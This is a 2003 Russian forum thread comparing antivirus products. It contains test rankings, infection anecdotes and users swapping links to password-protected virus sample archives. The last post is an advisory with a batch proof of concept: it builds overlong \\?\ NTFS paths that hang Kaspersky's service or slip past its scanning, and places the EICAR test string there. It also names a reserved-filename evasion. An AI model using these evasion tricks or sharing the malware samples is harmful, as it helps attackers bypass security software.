Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Компьютеры » Программы » Закладки » Обзор антивирусов под Windows XP

Модерирует : gyra, Maz

Widok (21-11-2004 01:21): переезд:
http://forum.ru-board.com/topic.cgi?forum=5&topic=13771#1
 Версия для печати • ПодписатьсяДобавить в закладки
Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106

   

Widok



Moderator-Следопыт
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
ТЕСТЫ АНТИВИРУСОВ НА RU-BOARD
 
В начале октября 2003 года проводились тесты антивирусов.За результатами тестов на коллекциях вирусов антивирусные программы распределены по группам:
 
1.Очень надёжные(F-Secure Client Security, DrWeb 4.30a, KAV 4.5.0.49, McAfee VirusScan 7.03).Они не пропустили ни одного вируса из КРВ и показали хорошие результаты на БКВ.
2.Заслуживающие доверия(RAV 8.6x, Panda 7x, PC-cillin 2003, AVG 7.0,eTrust Antivirus 7.0x).Они пропустили до 3% вирусов из КРВ и показали неплохие результаты на БКВ.
3.Не очень надёжные(Sophos 3.74, eTrust EZ 6.1.7.0, F-Prot 3.14b, Eset NOD32 2.0x, Norton AV 2004,Alwil avast! 4.1).Пропущено больше 9% вирусов из КРВ,как правило загрузочных.
4.Ненадёжные(Norman Virus Control 5.6,UNA 1.80, CAT Quick Heal X Gen 6.10).Пропущено больше 9% вирусов из КРВ по многим категориям и показаны плохие результаты на БКВ.
 
*КРВ-коллекция распространённых вирусов (за основу взята коллекция In the Wild)
Полный список КРВ здесь
**БКВ-большая коллекция вирусов (количество вирусов-7226) результаты здесь
 
ВОТ РЕЙТИНГ АНТИВИРУСОВ ПОСЛЕ ПРОВЕДЕНИЯ ТЕСТОВ:
 
Место НАЗВАНИЕ АНТИВИРУСА ОЦЕНКА    
1. Kaspersky AV 4.5.0.49 96,30    
2. F-Secure Client Security 5.50 94,29    
3. McAfee VirusScan 7.03 91,74    
4. DrWeb 4.30a 91,36    
5. RAV 8.6.105 85,04    
6. Panda AV Platinum 7.0x 84,34    
7. PC-cillin 2003 78,62    
8. eTrust AV 7.0.142 (InoculateIT) 78,27    
9. AVG 7.0x 70,49    
10. Norton AV 2004 49,39    
11. Frisk F-prot 3.14b 48,23    
12. Alwil avast! 4.1 45,64    
13. Sophos AV 3.74 39,39    
14. UNA 1.80 34,35    
15. Norman Virus Control 5.6 34,04    
16. Eset NOD32 2.0 33,76    
17. eTrust EZ 6.1.7 32,50    
18. CAT Quick Heal X Gen 6.10 32,41

 
Список показателей, по которым оценивались антивирусные программы, а также система их оценки находятся здесь.
 
Сводная таблица (без учёта тестов eTrust Antivirus 7.0.142) находится по этому адресу:
http://forum.ru-board.com/topic.cgi?forum=5&bm=1&topic=6577&start=800
 
Сводная таблица тестов от virusbtn находится по этому адресам:
http://www.virusbtn.com/vb100/archives/products.xml
http://www.virusbtn.com/vb100/archives/products.xml?table
 
прежняя тема: http://forum.ru-board.com/topic.cgi?forum=5&topic=2093&start=0

Всего записей: 24190 | Зарегистр. 07-04-2002 | Отправлено: 02:45 06-02-2003 | Исправлено: biomednet, 12:15 18-10-2004
Spybot



BANNED
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Warez_Expert
так это же не моя коллекция - это те самые 7226 объектов (как я их называю) + более 300 из коллекции biomednet...
смотри линки здесь в первом посте и в прежней теме
не знаю жив ли линк на большую коллекцию - если нет то просить залить нужно не меня, я счас скромно на 64 Кbps сижу

Всего записей: 1113 | Зарегистр. 07-12-2002 | Отправлено: 00:03 09-02-2003
Warez_Expert



Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Spybot
а где эти 7226 объктов взять?
эту http://nod32.newmail.ru/virii2.rar коллекцию я скачал
и все вирусы с VirusZone скачал

Всего записей: 299 | Зарегистр. 27-01-2002 | Отправлено: 00:05 09-02-2003
Spybot



BANNED
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Warez_Expert

Цитата:
а где эти 7226 объктов взять?

что же ты к раздаче то опоздал
так понял нет живых линков - договаривайся с кем-нибудь из счастливых обладателей коллекции и толстых каналов
а "вирусы с VirusZone" это ты про что?

Всего записей: 1113 | Зарегистр. 07-12-2002 | Отправлено: 00:16 09-02-2003
Warez_Expert



Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Spybot
VirusZone: ну там есть около 189 вирусов

Всего записей: 299 | Зарегистр. 27-01-2002 | Отправлено: 00:25 09-02-2003
tolja

Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
У меня вопрос ко всем.Кто-нибудь пережил РЕАЛЬНУЮ вирусную атаку?С каким антивирусом?Так сказать,вести с "фронта".Если есть кому что рассказать,то расскажите.

Всего записей: 2449 | Зарегистр. 24-08-2002 | Отправлено: 00:37 09-02-2003
helix



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Как-то недавно загрузил козой один мультик.Перед открытием просканировал его  
NAV2003-тот обнаружил вирус Hantaner, затем вылечил этот файл. Ну, раз вылечил я его
и открыл...Немедленно начались глюки в самых разных местах, но первое,что сделал этот вирь - снес сам NAV. А именно - при попытке активациии NAV сообщал-активация невозможна-нет антивирусной базы.А при попытке апдейтится выдавал - апдейт невоз-
можен, т.к. все апдейты уже проведены.Я снес NAV и поставил McAfee.Тот вирь сразу
обнаружил, но сделать с ним что-либо отказался (лечить или удалить), т.к. тот располо-
жился в системном скрытом CAB-файле.Снес McAfee, поставил AVP4. Тот молча,даже без
апдейта, тут же снес этот файл.Впрочем, вирь уже успел порядком нагадить,так что при-
шлось в итоге сносить всю винду ...

Всего записей: 996 | Зарегистр. 16-01-2003 | Отправлено: 12:17 10-02-2003
tolja

Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
helix
Это уже серьезно.Tвой рассказ наводит на неприятные мысли,у меня NAV.

Всего записей: 2449 | Зарегистр. 24-08-2002 | Отправлено: 12:31 10-02-2003
Demetrio

uid=0
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
helix

Цитата:
NAV2003-тот обнаружил вирус Hantaner, затем вылечил этот файл. Ну, раз вылечил я его  
и открыл...

Хм... Я бы не стал открывать скачанный файл в котором был вирус....

Всего записей: 9967 | Зарегистр. 29-05-2002 | Отправлено: 12:37 10-02-2003
korn32



Gold Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
helix
Так вирус был в *.avi файле? Или это на флеше мультик был?

----------
Many electrons died to bring you this data...

Всего записей: 5233 | Зарегистр. 31-10-2001 | Отправлено: 12:44 10-02-2003
helix



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Что касается мультика-уточняю. Козой я делал поиск игры Tomb Raider1-3.Вместо game
мне предложили секс-мультик о Ларе Крофт.  Сделан он был в виде простого rar
файла.

Всего записей: 996 | Зарегистр. 16-01-2003 | Отправлено: 15:48 10-02-2003
DrInvizzi



Full Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Widok
Предлагаю из шапки убрать следующие строки,так как они подтверждают и повторяют написанное выше.Об ошибках здесь,в шапке,нечего писать,потому что:
1.Тестирование велось на маленькой базе
2.biomednet проводил тесты на Windows 98SE
3.Ошибки,которые были у него,не повторились у других,а если и некоторые были,то они уже наверное устранены.
 

Цитата:
Ошибки в работе:  
Касперский - странное сообщение - ошибка ядра файла....  
Пропущено 4 вируса, занесенные в базу.Вообще не увидел. Режим избыточного сканирования...  
Пропущено 14 допплеров ( модификаций, от нем. доппельгангер- двойник)  
Есть Официальное подтверждение службы поддержки.  
 
Нортон - громоздкий интерфейс, пропущено 19 вирусов, занесенных в базу-ошибка удаления. Эвристических сообщений нет.  
 
 
DrWeb - в 4 файлах видит вирусы при попытке лечить - виснет и зацикливается ( ***- вылечен... и так до бесконечности)  
Вылечено 2 генератора вируса, нелечимые Каспером. Высокая скорость работы, отличная эвристика! Именно DrWeb нашл 14 допплеров, пропущенных Касперским.  
 
BAT.MF.227  
BAT.MF.251  
Jerusalem.Zipeater  
DREG-based  
http://nod32.newmail.ru/DREG-based.exe      
пароль 12345  
эти файлы завешивают DrWeb 4.29b при лечении  (15:27 17-01-2003 )  
периодически не совпадали количества перемещенных и подозрительных обьектов в обе стороны,  так что все это  странно....  
 
 
Макафя нашла вирусы в 2 файлах и на них повисла. ( просто подвисла и все)  
Эвристических сообщений нет.  
Обнаруженная проблема -  
некорректная работа с вирусами  
Win95.Rat.463 (зависание)  
win.95.Rat.505 (зависание, после принудительной выгрузки макафи исходный файл из 4 кило превратился в 1109 Кило (практически мегабайт!)  
 
NOD32 фантастическая скорость проверки. БольшАя часть вирусов обнаружена эвристикой - свыше 900 шт! Практически не лечит.  
   
Norman VC - есть эвристические сообщения. Мало лечит. Бедный интерфейс.  
Возможность менять настройки без перезагрузки. Средняя скорость работы.  
   
Panda 7 antivirus Platinum Retail  
Хороший интерфейс, много видит и лечит, есть эвристические сообщения.  
Однако к концу работы плавно падает скорость.  
В связи с очень медленной работой сканера Панды(вероятно при высокой эвристике и может быть, моногократной перезаписи лог-файла, может еще почему) на МОЕМ компе я выключил досрочно. Прошу перепроверить меня.  
 
eTrust InaculateIT  
Очень быстрый, безглючный, очень удобный понятный интерфейс,  
богат настройками. Есть возможность менять движок. так что Вы получаете сразу 2 антивируса. Движок VET на этой коллекции нашел чуть меньше вирусов, зато "подобрал" вирусы, пропущенные предыдущим движком InaculateIT . Очень подробный информативный лог.  
 
F-Prot Antivirus  
 Интерфейс богатый настройками, но серый и невзрачный в Win98/Me, стильный и красивый в WinXP....  
есть сообщение, что не могу вылечить файл этого типа...  
возможно, что файл с расширением был бы вылечен... может еще что... но и так очень неплохо!  
Эвристик -  
 
Итак, можно выбирать из представленного списка. Тест показал, что почти все антивирусы прекрасно работают.  
 
(прошу учесть, что результаты теста условны и не могут служить для однозначной характеристики антивируса!!! )  
   

...
Цитата:
P.S. Вирусы моей личной коллекции  
пароль 12345, RAR 3.10  

 
 
Таким образом мы уменьшим шапку.
 
To All:
 
Провожу тестирование финского антивируса F-Secure Antivirus 5.41.Скоро сделаю обзор.Пока что могу сказать,что у меня очень и очень положительные впечатления от этой версии...

Всего записей: 533 | Зарегистр. 01-03-2002 | Отправлено: 16:01 10-02-2003
Spybot



BANNED
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Demetrio

Цитата:
Я бы не стал открывать скачанный файл в котором был вирус....

я бы тоже просто так не стал
и как после этого медицине ихней доверять
 
DrInvizzi

Цитата:
Об ошибках здесь,в шапке,нечего писать,потому что:  
1.Тестирование велось на маленькой базе  
2.biomednet проводил тесты на Windows 98SE  
3.Ошибки,которые были у него,не повторились у других,а если и некоторые были,то они уже наверное устранены.

1. тестирование на бОльшей базе даст бОльшее количество ошибок - насколько я понимаю меньше их не станет
2. я думаю 98-я тут не сыграла большой роли
3. я подтвердил ошибки ДрВэб, biomednet в свою очередь подтвердил "странности" в работе и обновлениях F-Prot, про остальные ошибки все дружно промолчали не попытавшись их опровергнуть/подтвердить, нет сообщений и об устранении ошибок (а хотелось бы)
я не против компактной шапки но имхо об ошибках в целом надо говорить, и об их исправлениях тоже - если антивири такого уровня как МакКаффи и ДрВэб намертво виснут при лечении это заслуживает внимания как мне кажется
 
 
Добавлено
Widok
всё правильно
в первом посте нужно было убрать именно субъективные данные
 
вспомнил - запускал я из интереса один файл вылеченный Вэбом - инфицирования не произошло, к "сожалению" он и вправду его вылечил

Всего записей: 1113 | Зарегистр. 07-12-2002 | Отправлено: 16:22 10-02-2003 | Исправлено: Spybot, 16:47 10-02-2003
Widok



Moderator-Следопыт
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
я тут шапочку поменял как и обещал.

----------
Тень превращается в фантазии, таящиеся в глубине вашей души.
Пока идёшь ты среди теней, да не будет зла с тобой.

Всего записей: 24190 | Зарегистр. 07-04-2002 | Отправлено: 16:59 10-02-2003
x25



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Козой я делал поиск игры Tomb Raider1-3.Вместо game мне предложили секс-мультик



Цитата:
NAV2003... обнаружил вирус Hantaner, затем вылечил этот файл... я его и открыл... начались глюки... Я снес NAV и поставил McAfee. Тот вирь... обнаружил, но сделать с ним что-либо отказался. Снес McAfee, поставил AVP4. Тот... снес этот файл. Впрочем, вирь уже успел порядком нагадить, так что пришлось в итоге сносить всю винду...

Как велика однако должна быть тяга к Ларе Крофт!

Цитата:
и как после этого медицине ихней доверять  

Если у человека есть воля к жизни, то медицина бессильна!

Всего записей: 3285 | Зарегистр. 15-07-2002 | Отправлено: 18:16 10-02-2003
Liberty_2000

Silver Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
ПРопостил McAfee с разными парами по 7226 объектах. Настройки - удалять заразу.
Результат: после McAfee осталось 60 файлов. Далее через остаток:
Число оставшихся файлов:
F-Prot - 23
InoccolateIT - 25
DrWeb - 45

Так что, несмотря на не нравящийся мне интерфейс, F-Prot - лучшая пара к McAfee.
 
Попробовал после него Доктором, осталось 19.  
ИМХО третий сканер почти ничего не дает...  


----------
Праздник без водки как паспорт без фотки

Всего записей: 2736 | Зарегистр. 09-07-2002 | Отправлено: 18:58 10-02-2003
tolja

Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Если у человека есть воля к жизни, то медицина бессильна!  

 
Я думаю,вместо того чтобы смеятся,вы бы заценили человека.Он РЕАЛЬНО боролся с вирусом и рассказал об этом.

Всего записей: 2449 | Зарегистр. 24-08-2002 | Отправлено: 19:06 10-02-2003
x25



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
tolja
Я и заценил. Откровенность и юмор, с которыми helix рассказал, как он
Цитата:
РЕАЛЬНО боролся с вирусом  
вне всякого сомнения достойны уважения. Серьезно, без дураков.
А запостил я собственно к тому, что зачастую мы сами создаем себе на ровном месте такие проблемы, что ни одна прога не в состоянии их разрулить.
P.S. Я не исключение.

Всего записей: 3285 | Зарегистр. 15-07-2002 | Отправлено: 22:44 10-02-2003 | Исправлено: x25, 22:45 10-02-2003
tolja

Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
P.S. Я не исключение.

Господи,да мы все такие!

Всего записей: 2449 | Зарегистр. 24-08-2002 | Отправлено: 22:49 10-02-2003
Warez_Expert



Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Люди!!!
Дайте please скачать эти 7226 объектов

Всего записей: 299 | Зарегистр. 27-01-2002 | Отправлено: 23:31 10-02-2003
Farch



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Обнаружено несколько уязвимостей в "Антивирусе Касперского", которые могут использоваться для DoS атаки и обхода проверки злонамеренного кода.
 
1. Файловая система NTFS позволяет создавать пути почти неограниченной длины. Но Windows API не позволяет создавать пути длинее 256 байтов. Чтобы обойти это ограничение можно использовать в пути к файлу префикс ‘\\?\’ . Это зарегистрированная особенность Windows API. Путь, длиннее 256 символов, приведет к зависанию KAV службы или заставит ее потреблять 100% ресурсов CPU. Возможно, уязвимость может использоваться для выполнения произвольного кода. Длинный путь может также использоваться для обхода проверки антивирусом.
 
Пример:
<pre>
@echo off
SET
A=AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A%
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7} $EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\%A%\%A%\%A%\%A%\%A%\%A%\%A%.com
</pre>
 
2. NTFS файл с именем aux.vbs или aux.com, содержащий злонамеренный код, не будет проверен антивирусом.
 
Уязвимость обнаружена в Kaspersky Antivirus 4.0.9.0 и более ранних версиях.

касп сосёт

Всего записей: 3211 | Зарегистр. 25-12-2001 | Отправлено: 19:28 13-02-2003
   

Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106

Компьютерный форум Ru.Board » Компьютеры » Программы » Закладки » Обзор антивирусов под Windows XP
Widok (21-11-2004 01:21): переезд:
http://forum.ru-board.com/topic.cgi?forum=5&topic=13771#1


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2024

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru